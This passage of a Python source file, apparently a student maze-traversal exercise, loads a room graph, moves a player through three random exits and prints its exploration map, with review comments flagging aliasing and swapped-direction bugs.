21), {'s': 358}], 411: [(4, 22), {'e': 324, 'w': 428}], 396: [(4, 23), {'e': 391}], 449: [(5, 4), {'n': 432, 'e': 450}], 432: [(5, 5), {'n': 405, 's': 449, 'e': 473}], 405: [(5, 6), {'n': 356, 's': 432}], 356: [(5, 7), {'n': 299, 's': 
405}], 299: [(5, 8), {'n': 263, 's': 356, 'w': 312}], 263: [(5, 9), {'n': 236, 's': 299, 'w': 372}], 236: [(5, 10), {'s': 263, 'e': 216, 'w': 258}], 220: [(5, 11), {'n': 230, 'e': 215, 'w': 314}], 230: [(5, 12), {'s': 220, 'w': 344}], 266: [(5, 13), {'n': 379, 'e': 260}], 379: [(5, 14), {'s': 266}], 274: [(5, 15), {'e': 222}], 254: [(5, 16), {'e': 205, 'w': 284}], 227: [(5, 17), {'e': 194}], 187: [(5, 18), {'n': 303, 'e': 167, 'w': 301}], 303: [(5, 19), {'n': 352, 's': 187, 'w': 333}], 352: [(5, 20), {'s': 303}], 357: [(5, 21), {'e': 342}], 324: [(5, 22), {'n': 391, 'e': 289, 'w': 411}], 391: [(5, 23), {'n': 489, 's': 324, 'w': 396}], 489: [(5, 24), {'n': 491, 's': 391}], 491: [(5, 25), {'s': 489}], 450: [(6, 4), {'w': 449}], 473: [(6, 5), {'w': 432}], 423: [(6, 6), {'e': 395}], 469: [(6, 7), {'e': 362}], 310: [(6, 8), {'n': 271}], 271: [(6, 9), {'s': 310, 'e': 217}], 216: [(6, 10), {'e': 213, 'w': 236}], 215: [(6, 11), {'n': 243, 'e': 177, 'w': 220}], 243: [(6, 12), {'s': 215}], 260: [(6, 13), {'n': 226, 'w': 266}], 226: [(6, 14), {'s': 260, 'e': 225}], 222: [(6, 15), {'e': 190, 'w': 274}], 205: [(6, 16), {'e': 162, 'w': 254}], 194: [(6, 17), {'e': 128, 'w': 227}], 167: [(6, 18), {'e': 108, 'w': 187}], 171: [(6, 19), {'e': 168}], 297: [(6, 20), {'e': 207}], 342: [(6, 21), {'e': 221, 'w': 357}], 289: [(6, 22), {'n': 319, 'e': 250, 'w': 324}], 319: [(6, 23), {'n': 441, 's': 289}], 441: [(6, 24), {'s': 319}], 453: [(6, 25), {'e': 351}], 395: [(7, 6), {'n': 362, 'w': 423}], 362: [(7, 7), {'n': 327, 's': 395, 'w': 469}], 327: [(7, 8), {'s': 362, 'e': 256}], 217: [(7, 9), {'n': 213, 'w': 271}], 213: [(7, 10), {'s': 217, 'e': 209, 'w': 216}], 177: [(7, 11), {'e': 156, 'w': 215}], 180: [(7, 12), {'e': 164}], 235: [(7, 13), {'e': 158}], 225: [(7, 14), {'e': 105, 'w': 226}], 190: [(7, 15), {'e': 129, 'w': 222}], 162: [(7, 16), {'n': 128, 'w': 205}], 128: [(7, 17), {'s': 162, 'e': 92, 'w': 194}], 108: [(7, 18), {'e': 81, 'w': 167}], 168: [(7, 19), {'n': 207, 'e': 137, 'w': 
171}], 207: [(7, 20), {'s': 168, 'w': 297}], 221: [(7, 21), {'n': 250, 'e': 174, 'w': 342}], 250: [(7, 22), {'n': 295, 's': 221, 'w': 289}], 295: [(7, 23), {'n': 332, 's': 250}], 332: [(7, 24), {'n': 351, 's': 295}], 351: [(7, 25), {'n': 417, 's': 332, 'w': 453}], 417: [(7, 26), {'n': 442, 's': 351}], 442: [(7, 27), {'s': 417}], 410: [(8, 5), {'e': 406}], 323: [(8, 6), {'n': 279}], 279: [(8, 7), {'n': 256, 's': 323}], 256: [(8, 8), {'n': 241, 's': 279, 'w': 327}], 241: [(8, 9), {'s': 256, 'e': 193}], 209: [(8, 10), {'n': 156, 'w': 213}], 156: [(8, 11), {'s': 209, 'e': 149, 'w': 177}], 164: [(8, 12), {'n': 158, 'w': 180}], 158: [(8, 13), {'s': 164, 'e': 126, 'w': 235}], 105: [(8, 14), {'n': 129, 'e': 104, 'w': 225}], 129: [(8, 15), {'s': 105, 'w': 190}], 100: [(8, 16), {'n': 92}], 92: [(8, 17), {'n': 81, 's': 100, 'w': 128}], 81: [(8, 18), {'n': 137, 's': 92, 'e': 45, 'w': 108}], 137: [(8, 19), {'s': 81, 'w': 168}], 124: [(8, 20), {'n': 174, 'e': 112}], 174: [(8, 21), {'n': 277, 's': 124, 'w': 221}], 277: [(8, 22), {'n': 331, 's': 174}], 331: [(8, 23), {'n': 387, 's': 277}], 387: [(8, 24), {'n': 444, 's': 331}], 444: [(8, 25), {'s': 387}], 422: [(8, 26), {'n': 461, 'e': 394}], 461: [(8, 27), {'s': 422}], 406: [(9, 5), {'n': 315, 'w': 410}], 315: [(9, 6), {'n': 269, 's': 406, 'e': 335}], 269: [(9, 7), {'n': 203, 's': 315}], 203: [(9, 8), {'n': 193, 's': 269}], 193: [(9, 9), {'n': 191, 's': 203, 'w': 241}], 191: [(9, 10), {'n': 149, 's': 193}], 149: [(9, 11), {'n': 135, 's': 191, 'w': 156}], 135: [(9, 12), {'n': 126, 's': 149}], 126: [(9, 13), {'n': 104, 's': 135, 'w': 158}], 104: [(9, 14), {'n': 89, 's': 126, 'w': 105}], 89: [(9, 15), {'n': 72, 's': 104}], 72: [(9, 16), {'n': 69, 's': 89}], 69: [(9, 17), {'s': 72, 'e': 41}], 45: [(9, 18), {'n': 85, 'e': 40, 'w': 81}], 85: [(9, 19), {'s': 45}], 112: [(9, 20), {'n': 210, 'e': 106, 'w': 124}], 210: [(9, 21), {'s': 112}], 208: [(9, 22), {'n': 307, 'e': 166}], 307: [(9, 23), {'s': 208}], 341: [(9, 24), {'e': 316}], 374: 
[(9, 25), {'e': 340}], 394: [(9, 26), {'n': 426, 'e': 318, 'w': 422}], 426: [(9, 27), {'s': 394}], 477: [(9, 29), {'e': 443}], 485: [(10, 3), {'e': 481}], 346: [(10, 5), {'n': 335}], 335: [(10, 6), {'s': 346, 'e': 378, 'w': 315}], 369: [(10, 7), {'n': 247}], 247: [(10, 8), {'s': 369, 'e': 234}], 151: [(10, 9), {'n': 188, 'e': 133}], 188: [(10, 10), {'s': 151}], 183: [(10, 11), {'n': 145}], 145: [(10, 12), {'s': 183, 'e': 113}], 122: [(10, 13), {'n': 99}], 99: [(10, 14), {'n': 83, 's': 122}], 83: [(10, 15), {'s': 99, 'e': 80}], 76: [(10, 16), {'n': 41}], 41: [(10, 17), {'s': 76, 'e': 36, 'w': 69}], 40: [(10, 18), {'n': 74, 'e': 19, 'w': 45}], 74: [(10, 19), {'s': 40}], 106: [(10, 20), {'n': 161, 'e': 79, 'w': 112}], 161: [(10, 21), {'n': 166, 's': 106}], 166: [(10, 22), {'s': 161, 'w': 208}], 292: [(10, 23), {'n': 316, 'e': 185}], 316: [(10, 24), {'s': 292, 'w': 341}], 340: [(10, 25), {'n': 318, 'w': 374}], 318: [(10, 26), {'s': 340, 'e': 199, 'w': 394}], 392: [(10, 27), {'n': 408, 'e': 281}], 408: [(10, 28), {'n': 443, 's': 392}], 443: [(10, 29), {'s': 408, 'w': 477}], 481: [(11, 3), {'n': 472, 'w': 485}], 472: [(11, 4), {'n': 466, 's': 481, 'e': 495}], 466: [(11, 5), {'n': 378, 's': 472}], 378: [(11, 6), {'s': 466, 'w': 335}], 280: [(11, 7), {'n': 234}], 234: [(11, 8), {'n': 133, 's': 280, 'e': 259, 'w': 247}], 133: [(11, 9), {'s': 234, 'e': 118, 'w': 151}], 157: [(11, 10), {'e': 110}], 153: [(11, 11), {'e': 97}], 113: [(11, 12), {'e': 94, 'w': 145}], 68: [(11, 13), {'e': 57}], 58: [(11, 14), {'e': 23}], 80: [(11, 15), {'n': 11, 'w': 83}], 11: [(11, 16), {'s': 80, 'e': 3}], 36: [(11, 17), {'e': 21, 'w': 41}], 19: [(11, 18), {'n': 32, 'e': 15, 'w': 40}], 32: [(11, 19), {'s': 19}], 79: [(11, 20), {'e': 46, 'w': 106}], 63: [(11, 21), {'n': 140, 'e': 61}], 140: [(11, 22), {'s': 63}], 185: [(11, 23), {'n': 195, 'e': 155, 'w': 292}], 195: [(11, 24), {'s': 185}], 328: [(11, 25), {'e': 200}], 199: [(11, 26), {'n': 281, 'e': 197, 'w': 318}], 281: [(11, 27), {'n': 350, 's': 
199, 'w': 392}], 350: [(11, 28), {'n': 425, 's': 281}], 425: [(11, 29), {'n': 434, 's': 350}], 434: [(11, 30), {'s': 425}], 495: [(12, 4), {'w': 472}], 415: [(12, 5), {'n': 306}], 306: [(12, 6), {'n': 291, 's': 415}], 291: [(12, 7), {'n': 259, 's': 306}], 259: [(12, 8), {'s': 291, 'w': 234}], 118: [(12, 9), {'n': 110, 'e': 218, 'w': 133}], 110: [(12, 10), {'n': 97, 's': 118, 'w': 157}], 97: [(12, 11), {'n': 94, 's': 110, 'w': 153}], 94: [(12, 12), {'n': 57, 's': 97, 'w': 113}], 57: [(12, 13), {'n': 23, 's': 94, 'w': 68}], 23: [(12, 14), {'s': 57, 'e': 6, 'w': 58}], 16: [(12, 15), {'e': 8}], 3: [(12, 16), {'n': 21, 'e': 0, 'w': 11}], 21: [(12, 17), {'s': 3, 'w': 36}], 15: [(12, 18), {'e': 13, 'w': 19}], 47: [(12, 19), {'e': 14}], 46: [(12, 20), {'n': 61, 'e': 17, 'w': 79}], 61: [(12, 21), {'n': 82, 's': 46, 'w': 63}], 82: [(12, 22), {'n': 155, 's': 61}], 155: [(12, 23), {'s': 82, 'w': 185}], 175: [(12, 24), {'n': 200, 'e': 141}], 200: [(12, 25), {'s': 175, 'e': 204, 'w': 328}], 197: [(12, 26), {'e': 165, 'w': 199}], 223: [(12, 27), {'n': 483, 'e': 169}], 483: [(12, 28), {'s': 223}], 488: [(13, 4), {'n': 409}], 409: [(13, 5), {'n': 345, 's': 488}], 345: [(13, 6), {'n': 261, 's': 409}], 261: [(13, 7), {'n': 252, 's': 345}], 252: [(13, 8), {'n': 218, 's': 261}], 218: [(13, 9), {'n': 144, 's': 252, 'w': 118}], 144: [(13, 10), {'n': 134, 's': 218}], 134: [(13, 11), {'n': 65, 's': 144}], 65: [(13, 12), {'n': 62, 's': 134}], 62: [(13, 13), {'n': 6, 's': 65}], 6: [(13, 14), {'s': 62, 'e': 5, 'w': 23}], 8: [(13, 15), {'n': 0, 'w': 16}], 0: [(13, 16), {'n': 4, 's': 8, 'e': 1, 'w': 3}], 4: [(13, 17), {'s': 0}], 13: [(13, 18), {'n': 14, 'e': 9, 'w': 15}], 14: [(13, 19), {'n': 17, 's': 13, 'w': 47}], 17: [(13, 20), {'n': 33, 's': 14, 'e': 28, 'w': 46}], 33: [(13, 21), {'s': 17}], 102: [(13, 22), {'n': 107, 'e': 64}], 107: [(13, 23), {'n': 141, 's': 102}], 141: [(13, 24), {'s': 107, 'w': 175}], 204: [(13, 25), {'w': 200}], 165: [(13, 26), {'n': 169, 'e': 163, 'w': 197}], 169: 
[(13, 27), {'n': 385, 's': 165, 'w': 223}], 385: [(13, 28), {'s': 169}], 497: [(13, 30), {'e': 366}], 424: [(14, 4), {'n': 322}], 322: [(14, 5), {'s': 424, 'e': 276}], 290: [(14, 6), {'n': 264}], 264: [(14, 7), {'n': 244, 's': 290}], 244: [(14, 8), {'s': 264, 'e': 232}], 181: [(14, 9), {'n': 179}], 179: [(14, 10), {'n': 96, 's': 181, 'e': 201}], 96: [(14, 11), {'n': 66, 's': 179}], 66: [(14, 12), {'n': 50, 's': 96}], 50: [(14, 13), {'n': 5, 's': 66, 'e': 70}], 5: [(14, 14), {'n': 2, 's': 50, 'w': 6}], 2: [(14, 15), {'n': 1, 's': 5, 'e': 10}], 1: [(14, 16), {'n': 7, 's': 2, 'e': 22, 'w': 0}], 7: [(14, 17), {'n': 9, 's': 1, 'e': 12}], 9: [(14, 18), {'s': 7, 'w': 13}], 30: [(14, 19), {'n': 28}], 28: [(14, 20), {'n': 60, 's': 30, 'w': 17}], 60: [(14, 21), {'n': 64, 's': 28}], 64: [(14, 22), {'n': 111, 's': 60, 'w': 102}], 111: [(14, 23), {'n': 121, 's': 64, 'e': 114}], 121: [(14, 24), {'n': 148, 's': 111, 'e': 123}], 148: [(14, 25), {'n': 163, 's': 121, 'e': 178}], 163: [(14, 26), {'n': 257, 's': 148, 'e': 228, 'w': 165}], 257: [(14, 27), {'n': 388, 's': 163}], 388: [(14, 28), {'s': 257, 'n': 386}], 386: [(14, 29), {'e': 354, 's': 388}], 366: [(14, 30), {'e': 361, 'w': 497}], 467: [(15, 3), {'n': 459}], 459: [(15, 4), {'n': 276, 's': 467}], 276: [(15, 5), {'n': 268, 's': 459, 'w': 322}], 268: [(15, 6), {'n': 265, 's': 276}], 265: [(15, 7), {'n': 232, 's': 268, 'e': 273}], 232: [(15, 8), {'n': 206, 's': 265, 'w': 244}], 206: [(15, 9), {'n': 201, 's': 232}], 201: [(15, 10), {'s': 206, 'w': 179}], 159: [(15, 11), {'n': 116}], 116: [(15, 12), {'n': 70, 's': 159}], 70: [(15, 13), {'s': 116, 'e': 87, 'w': 50}], 38: [(15, 14), {'n': 10}], 10: [(15, 15), {'s': 38, 'w': 2}], 22: [(15, 16), {'w': 1}], 12: [(15, 17), {'n': 20, 'e': 18, 'w': 7}], 20: [(15, 18), {'n': 31, 's': 12, 'e': 26}], 31: [(15, 19), {'n': 37, 's': 20}], 37: [(15, 20), {'n': 91, 's': 31, 'e': 42}], 91: [(15, 21), {'n': 101, 's': 37}], 101: [(15, 22), {'s': 91}], 114: [(15, 23), {'e': 120, 'w': 111}], 123: 
[(15, 24), {'e': 138, 'w': 121}], 178: [(15, 25), {'w': 148}], 228: [(15, 26), {'n': 253, 'w': 163}], 253: [(15, 27), {'n': 285, 's': 228}], 285: [(15, 28), {'s': 253}], 354: [(15, 29), {'n': 361, 'e': 321, 'w': 386}], 361: [(15, 30), {'s': 354, 'w': 366}], 455: [(16, 4), {'n': 382}], 382: [(16, 5), {'n': 296, 's': 455}], 296: [(16, 6), {'n': 273, 's': 382, 'e': 308}], 273: [(16, 7), {'s': 296, 'e': 298, 'w': 265}], 237: [(16, 8), {'n': 229, 'e': 370}], 229: [(16, 9), {'n': 212, 's': 237}], 212: [(16, 10), {'n': 127, 's': 229}], 127: [(16, 11), {'n': 117, 's': 212, 'e': 173}], 117: [(16, 12), {'n': 87, 's': 127, 'e': 170}], 87: [(16, 13), {'s': 117, 'w': 70}], 54: [(16, 14), {'n': 29}], 29: [(16, 15), {'n': 24, 's': 54}], 24: [(16, 16), {'n': 18, 's': 29, 'e': 25}], 18: [(16, 17), {'s': 24, 'e': 34, 'w': 12}], 26: [(16, 18), {'n': 27, 'w': 20}], 27: [(16, 19), {'s': 26, 'e': 55}], 42: [(16, 20), {'n': 51, 'w': 37}], 51: [(16, 21), {'n': 93, 's': 42}], 93: [(16, 22), {'s': 51}], 120: [(16, 23), {'w': 114}], 138: [(16, 24), {'n': 143, 'e': 139, 'w': 123}], 143: [(16, 25), {'s': 138}], 233: [(16, 26), {'n': 240, 'e': 152}], 240: [(16, 27), {'n': 304, 's': 233}], 304: [(16, 28), {'n': 321, 's': 240}], 321: [(16, 29), {'n': 334, 's': 304, 'w': 354}], 334: [(16, 30), {'s': 321, 'e': 384}], 416: [(17, 4), {'n': 317}], 317: [(17, 5), {'n': 308, 's': 416}], 308: [(17, 6), {'s': 317, 'e': 337, 'w': 296}], 298: [(17, 7), {'e': 360, 'w': 273}], 370: [(17, 8), {'w': 237}], 267: [(17, 9), {'n': 202, 'e': 302}], 202: [(17, 10), {'n': 173, 's': 267, 'e': 249}], 173: [(17, 11), {'s': 202, 'w': 127}], 170: [(17, 12), {'n': 182, 'w': 117}], 182: [(17, 13), {'s': 170, 'e': 211}], 77: [(17, 14), {'n': 43, 'e': 130}], 43: [(17, 15), {'n': 25, 's': 77, 'e': 49}], 25: [(17, 16), {'s': 43, 'w': 24}], 34: [(17, 17), {'n': 35, 'e': 39, 'w': 18}], 35: [(17, 18), {'s': 34, 'e': 44}], 55: [(17, 19), {'n': 56, 'w': 27}], 56: [(17, 20), {'n': 73, 's': 55, 'e': 67}], 73: [(17, 21), {'n': 132, 's': 
56}], 132: [(17, 22), {'n': 172, 's': 73}], 172: [(17, 23), {'s': 132}], 139: [(17, 24), {'n': 147, 'e': 176, 'w': 138}], 147: [(17, 25), {'n': 152, 's': 139, 'e': 154}], 152: [(17, 26), {'n': 196, 's': 147, 'w': 233}], 196: [(17, 27), {'n': 278, 's': 152, 'e': 224}], 278: [(17, 28), {'n': 338, 's': 196}], 338: [(17, 29), {'s': 278}], 384: [(17, 30), {'e': 435, 'w': 334}], 460: [(18, 4), {'n': 383}], 383: [(18, 5), {'n': 337, 's': 460}], 337: [(18, 6), {'s': 383, 'w': 308}], 360: [(18, 7), {'n': 364, 'w': 298}], 364: [(18, 8), {'s': 360, 'e': 401}], 302: [(18, 9), {'e': 402, 'w': 267}], 249: [(18, 10), {'w': 202}], 272: [(18, 11), {'n': 248}], 248: [(18, 12), {'n': 211, 's': 272}], 211: [(18, 13), {'s': 248, 'w': 182}], 130: [(18, 14), {'w': 77}], 49: [(18, 15), {'e': 119, 'w': 43}], 52: [(18, 16), {'n': 39}], 39: [(18, 17), {'s': 52, 'e': 71, 'w': 34}], 44: [(18, 18), {'n': 48, 'e': 59, 'w': 35}], 48: [(18, 19), {'s': 44, 'e': 53}], 67: [(18, 20), {'n': 84, 'w': 56}], 84: [(18, 21), {'n': 86, 's': 67}], 86: [(18, 22), {'n': 146, 's': 84, 'e': 95}], 146: [(18, 23), {'s': 86}], 176: [(18, 24), {'w': 139}], 154: [(18, 25), {'n': 192, 'e': 184, 'w': 147}], 192: [(18, 26), {'s': 154, 'e': 239}], 224: [(18, 27), {'n': 287, 'w': 196}], 287: [(18, 28), {'n': 313, 's': 224, 'e': 353}], 313: [(18, 29), {'s': 287}], 435: [(18, 30), {'w': 384}], 464: [(19, 6), {'n': 420}], 420: [(19, 7), {'n': 401, 's': 464}], 401: [(19, 8), {'s': 420, 'e': 427, 'w': 364}], 402: [(19, 9), {'e': 403, 'w': 302}], 371: [(19, 10), {'n': 309, 'e': 430}], 309: [(19, 11), {'n': 286, 's': 371, 'e': 377}], 286: [(19, 12), {'n': 242, 's': 309, 'e': 288}], 242: [(19, 13), {'n': 219, 's': 286}], 219: [(19, 14), {'n': 119, 's': 242, 'e': 305}], 119: [(19, 15), {'s': 219, 'e': 131, 'w': 49}], 115: [(19, 16), {'n': 71, 'e': 160}], 71: [(19, 17), {'s': 115, 'e': 150, 'w': 39}], 59: [(19, 18), {'e': 189, 'w': 44}], 53: [(19, 19), {'n': 75, 'w': 48}], 75: [(19, 20), {'n': 78, 's': 53, 'e': 88}], 78: [(19, 21), 
{'s': 75, 'e': 90}], 95: [(19, 22), {'n': 109, 'w': 86}], 109: [(19, 23), {'n': 136, 's': 95}], 136: [(19, 24), {'s': 109, 'e': 231}], 184: [(19, 25), {'w': 154}], 239: [(19, 26), {'n': 255, 'e': 336, 'w': 192}], 255: [(19, 27), {'s': 239}], 353: [(19, 28), {'n': 380, 'w': 287}], 380: [(19, 29), {'n': 476, 's': 353, 'e': 445}], 476: [(19, 30), {'s': 380}], 496: [(20, 4), {'n': 475}], 475: [(20, 5), {'n': 448, 's': 496}], 448: [(20, 6), {'n': 438, 's': 475, 'e': 490}], 438: [(20, 7), {'n': 427, 's': 448}], 427: [(20, 8), {'s': 438, 'e': 474, 'w': 401}], 403: [(20, 9), {'e': 439, 'w': 402}], 430: [(20, 10), {'e': 440, 'w': 371}], 377: [(20, 11), {'e': 456, 'w': 309}], 288: [(20, 12), {'n': 326, 'e': 498, 'w': 286}], 326: [(20, 13), {'s': 288}], 305: [(20, 14), {'e': 330, 'w': 219}], 131: [(20, 15), {'e': 329, 'w': 119}], 160: [(20, 16), {'e': 214, 'w': 115}], 150: [(20, 17), {'e': 251, 'w': 71}], 189: [(20, 18), {'e': 275, 'w': 59}], 103: [(20, 19), {'n': 88}], 88: [(20, 20), {'s': 103, 'e': 125, 'w': 75}], 90: [(20, 21), {'n': 98, 'e': 142, 'w': 78}], 98: [(20, 22), {'n': 186, 's': 90}], 186: [(20, 23), {'s': 98, 'e': 262}], 231: [(20, 24), {'n': 282, 'e': 294, 'w': 136}], 282: [(20, 25), {'s': 231}], 336: [(20, 26), {'n': 373, 'e': 421, 'w': 239}], 373: [(20, 27), {'s': 336}], 480: [(20, 28), {'n': 445}], 445: [(20, 29), {'s': 480, 'e': 446, 'w': 380}], 490: [(21, 6), {'w': 448}], 474: [(21, 8), {'w': 427}], 439: [(21, 9), {'w': 403}], 440: [(21, 10), {'w': 430}], 456: [(21, 11), {'w': 377}], 498: [(21, 12), {'w': 288}], 348: [(21, 13), {'n': 330}], 330: [(21, 14), {'s': 348, 'e': 454, 'w': 305}], 329: [(21, 15), {'e': 407, 'w': 131}], 214: [(21, 16), {'e': 246, 'w': 160}], 251: [(21, 17), {'w': 150}], 275: [(21, 18), {'e': 283, 'w': 189}], 198: [(21, 19), {'n': 125, 'e': 270}], 125: [(21, 20), {'s': 198, 'e': 238, 'w': 88}], 142: [(21, 21), {'n': 245, 'w': 90}], 245: [(21, 22), {'s': 142, 'e': 343}], 262: [(21, 23), {'e': 390, 'w': 186}], 294: [(21, 24), {'n': 
363, 'e': 311, 'w': 231}], 363: [(21, 25), {'s': 294}], 421: [(21, 26), {'w': 336}], 446: [(21, 29), {'w': 445}], 454: [(22, 14), {'w': 330}], 407: [(22, 15), {'w': 329}], 246: [(22, 16), {'n': 325, 'e': 412, 'w': 214}], 325: [(22, 17), {'s': 246}], 283: [(22, 18), {'e': 376, 'w': 275}], 270: [(22, 19), {'e': 300, 'w': 198}], 238: [(22, 20), {'n': 381, 'e': 293, 'w': 125}], 381: [(22, 21), {'s': 238, 'e': 431}], 343: [(22, 22), {'w': 245}], 390: [(22, 23), {'e': 398, 'w': 262}], 311: [(22, 24), {'n': 389, 'e': 499, 'w': 294}], 389: [(22, 25), {'s': 311}], 412: [(23, 16), {'w': 246}], 468: [(23, 17), {'n': 376}], 376: [(23, 18), {'s': 468, 'w': 283}], 300: [(23, 19), {'e': 320, 'w': 270}], 293: [(23, 20), {'w': 238}], 431: [(23, 21), {'w': 381}], 487: [(23, 22), {'n': 398}], 398: [(23, 23), {'s': 487, 'w': 390}], 499: [(23, 24), {'w': 311}], 471: [(24, 18), {'n': 320}], 320: [(24, 19), {'s': 471, 'w': 300}]}
# Build the world from the selected room graph and print the ASCII map.
world.loadGraph(roomGraph)
world.printRooms()
# Drop the player into the world's designated starting room.
player = Player("Name", world.startingRoom)
# USEFUL COMMANDS
# player.currentRoom.id
# player.currentRoom.getExits()
# player.travel(direction)
# Walk state: every move made so far, plus where the player just came from.
traversalPath = []
previous_room_id = 0                 # id of the room we were in before the last move
previous_exit_move = 'NONE'          # one-letter compass key of the last move
previous_exit_move_full = 'NONE'     # the same move spelled out (e.g. 'NORTH')
# Skeleton for a room's entry in the exploration graph; '?' marks an
# unexplored exit.  NOTE(review): this single dict is assigned directly into
# `graph` further down -- if entries are ever mutated in place they should be
# per-room copies of this template, not the template itself.
room_entry_template = {'n': '?',
                       's': '?',
                       'e': '?',
                       'w': '?'}
def print_nested(val, nesting = -5):
    """Pretty-print *val*.

    Dicts are recursed into, each level indented 5 more spaces than its
    parent (the -5 default cancels out at the top level); any non-dict
    value is printed on the line its key started.
    """
    if type(val) is not dict:
        print(val)
        return
    print("")
    depth = nesting + 5
    for key in val:
        print(depth * ' ', end='')
        print(key, end=': ')
        print_nested(val[key], depth)
def get_full_direction(previous_exit_move):
    """Translate a one-letter compass key ('n'/'s'/'e'/'w') into its
    full uppercase name; any other key yields None."""
    full_names = {'n': "NORTH", 's': "SOUTH", 'e': "EAST", 'w': "WEST"}
    return full_names.get(previous_exit_move)
def get_opposite_room_key_value(previous_exit_move):
    """Return the opposite compass code (n<->s, e<->w); None if unknown."""
    opposites = {"n": "s", "s": "n", "e": "w", "w": "e"}
    return opposites.get(previous_exit_move)
print("\n----------------------------------------------------------------")
print("\n************** WELCOME TO TICO'S ADVENTURE GAME! ***************\n")
print("----------------------------------------------------------------")
graph = {} # Creates our graph
# NOTE(review): BUG - this stores the SHARED room_entry_template dict itself,
# not a copy; every room added this way aliases the same dict, so updating one
# room's exits updates them all. Use dict(room_entry_template) instead.
graph[player.currentRoom.id] = room_entry_template
# ---- Status report before the first move ----
print("\n------------------CURRENT STATUS--------------------")
print("Previous Exit Move: \t\t\t", previous_exit_move_full)
print("Previous Room #: \t\t\t", previous_room_id)
print("Current Room #: \t\t\t", player.currentRoom.id)
print("\nTotal # of Exits: \t\t\t", len(player.currentRoom.getExits()))
print("Available Exits: ", player.currentRoom.getExits())
# Pick the next move uniformly at random from the available exits.
random_exit_array = random.sample(player.currentRoom.getExits(), 1)
random_exit_full = get_full_direction(random_exit_array[0])
print("Random Future Exit Move: \t\t", random_exit_full)
print("\nTotal # of Previous Moves: \t", len(traversalPath))
print("List of All Previous Moves: \n\t", traversalPath)
print("\nDictionary of Previously Visited Rooms:")
print_nested(graph)
print("\n------------------------------------------------------")
print("----------------------------------------------------------------\n\n")
# ---- Move #1 ----
previous_room_id = player.currentRoom.id # Sets ID of current room to previous_room_id BEFORE traveling
direction_to_travel = random_exit_array[0] # Sets randomly chosen exit direction to future direction_to_travel BEFORE traveling
direction_to_travel_full = get_full_direction(direction_to_travel)
previous_exit_move = direction_to_travel # Stores the previous move before player makes the move
previous_exit_move_full = get_full_direction(previous_exit_move)
player.travel(direction_to_travel) # Moves the player!
traversalPath.append(direction_to_travel) # Adds the player's RECENT move to the 'traversalPath'
print(f"\n--------------PLAYER MOVEMENT ALERT----------------")
print(f"\nYou just moved {direction_to_travel_full} from Room # {previous_room_id} to get to Room # {player.currentRoom.id}!\n")
graph[player.currentRoom.id] = room_entry_template # Creates a new 'room' entry for the current room
print("previous exit move: ", previous_exit_move)
# NOTE(review): the direction keys below look swapped. Moving e.g. 'n' from A
# to B should record A['n'] = B and B['s'] = A, but this stores
# A[opposite(move)] = B and (below) B[move] = A - confirm intent.
graph[previous_room_id][get_opposite_room_key_value(previous_exit_move)] = player.currentRoom.id
print("previous exit move: ", previous_exit_move)
print("Current Room: ", player.currentRoom.id)
graph[player.currentRoom.id][direction_to_travel] = previous_room_id
# ---- Status report after move #1 ----
print("------------------CURRENT STATUS--------------------")
print("Previous Exit Move: \t\t\t", previous_exit_move_full)
print("Previous Room #: \t\t\t", previous_room_id)
print("Current Room #: \t\t\t", player.currentRoom.id)
print("\nTotal # of Exits: \t\t\t", len(player.currentRoom.getExits()))
print("Available Exits: ", player.currentRoom.getExits())
random_exit_array = random.sample(player.currentRoom.getExits(), 1)
random_exit_full = get_full_direction(random_exit_array[0])
print("Random Future Exit Move: \t\t", random_exit_full)
print("\nTotal # of Previous Moves: \t", len(traversalPath))
print("List of All Previous Moves: \n\t", traversalPath)
print("\nDictionary of Previously Visited Rooms:")
print_nested(graph)
print("\n------------------------------------------------------")
print("----------------------------------------------------------------\n\n")
# ---- Move #2 (same steps as move #1) ----
previous_room_id = player.currentRoom.id
direction_to_travel = random_exit_array[0]
direction_to_travel_full = get_full_direction(direction_to_travel)
previous_exit_move = direction_to_travel
previous_exit_move_full = get_full_direction(previous_exit_move)
player.travel(direction_to_travel)
traversalPath.append(direction_to_travel)
print(f"\n--------------PLAYER MOVEMENT ALERT----------------")
print(f"\nYou just moved {direction_to_travel_full} from Room # {previous_room_id} to get to Room # {player.currentRoom.id}!\n")
# NOTE(review): shared-template aliasing again (room_entry_template is assigned,
# not copied), and the same swapped direction keys as after move #1.
graph[player.currentRoom.id] = room_entry_template
graph[player.currentRoom.id][previous_exit_move] = previous_room_id
print("previous exit move: ", previous_exit_move)
graph[previous_room_id][get_opposite_room_key_value(previous_exit_move)] = player.currentRoom.id
print("previous exit move: ", previous_exit_move)
# ---- Status report after move #2 ----
print("------------------CURRENT STATUS--------------------")
print("Previous Exit Move: \t\t\t", previous_exit_move_full)
print("Previous Room #: \t\t\t", previous_room_id)
print("Current Room #: \t\t\t", player.currentRoom.id)
print("\nTotal # of Exits: \t\t\t", len(player.currentRoom.getExits()))
print("Available Exits: ", player.currentRoom.getExits())
random_exit_array = random.sample(player.currentRoom.getExits(), 1)
random_exit_full = get_full_direction(random_exit_array[0])
print("Random Future Exit Move: \t\t", random_exit_full)
print("\nTotal # of Previous Moves: \t", len(traversalPath))
print("List of All Previous Moves: \n\t", traversalPath)
print("\nDictionary of Previously Visited Rooms:")
print_nested(graph)
print("\n------------------------------------------------------")
print("----------------------------------------------------------------\n\n")
# ---- Move #3 (same steps as moves #1 and #2) ----
previous_room_id = player.currentRoom.id
direction_to_travel = random_exit_array[0]
direction_to_travel_full = get_full_direction(direction_to_travel)
previous_exit_move = direction_to_travel
previous_exit_move_full = get_full_direction(previous_exit_move)
player.travel(direction_to_travel)
traversalPath.append(direction_to_travel)
print(f"\n--------------PLAYER MOVEMENT ALERT----------------")
print(f"\nYou just moved {direction_to_travel_full} from Room # {previous_room_id} to get to Room # {player.currentRoom.id}!\n")
# NOTE(review): shared-template aliasing again - all rooms end up sharing
# the one room_entry_template dict.
graph[player.currentRoom.id] = room_entry_template
print("previous exit move: ", previous_exit_move)
graph[player.currentRoom.id][previous_exit_move] = previous_room_id
print("previous exit move: ", previous_exit_move)
graph[previous_room_id][get_opposite_room_key_value(previous_exit_move)] = player.currentRoom.id
# ---- Final status report ----
print("------------------CURRENT STATUS--------------------")
print("Previous Exit Move: \t\t\t", previous_exit_move_full)
print("Previous Room #: \t\t\t", previous_room_id)
print("Current Room #: \t\t\t", player.currentRoom.id)
print("\nTotal # of Exits: \t\t\t", len(player.currentRoom.getExits()))
print("Available Exits: ", player.currentRoom.getExits())
random_exit_array = random.sample(player.currentRoom.getExits(), 1)
random_exit_full = get_full_direction(random_exit_array[0])
